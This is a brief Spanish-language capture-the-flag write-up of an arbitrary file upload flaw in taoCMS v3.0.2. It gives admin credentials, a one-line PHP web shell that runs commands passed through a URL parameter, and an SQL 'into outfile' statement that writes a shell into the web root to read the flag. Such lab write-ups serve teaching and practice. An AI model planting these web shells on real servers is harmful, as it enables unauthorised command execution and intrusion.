Tabla de contenido
2.1 El archivo escribe un caballo de Troya con una oración:
2.2 Escriba un caballo de Troya con una instrucción SQL:
1. Tema
Introducción de destino:
Existe una vulnerabilidad de carga de archivos arbitrarios en la administración de archivos taoCMS v3.0.2, los atacantes pueden ejecutar código arbitrario
2. Introduzca el tema:
visitar /administrar
administrador: tao
Página de gestión de fondo:
crear un nuevo archivo
2.1 El archivo escribe un caballo de Troya con una oración:
<?php system($_GET[1]);phpinfo();?>
Visite /shell.php?1=cat /flag
bandera{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}
<?php system('cat /flag');?>
bandera{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}
2.2 Escriba un caballo de Troya con una instrucción SQL:
Puede visitar:
Escriba una palabra caballo de Troya en el archivo:
select "<?php system('cat /flag');?>" into outfile '/var/www/html/cat.php'
Visita /cat.php
bandera{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}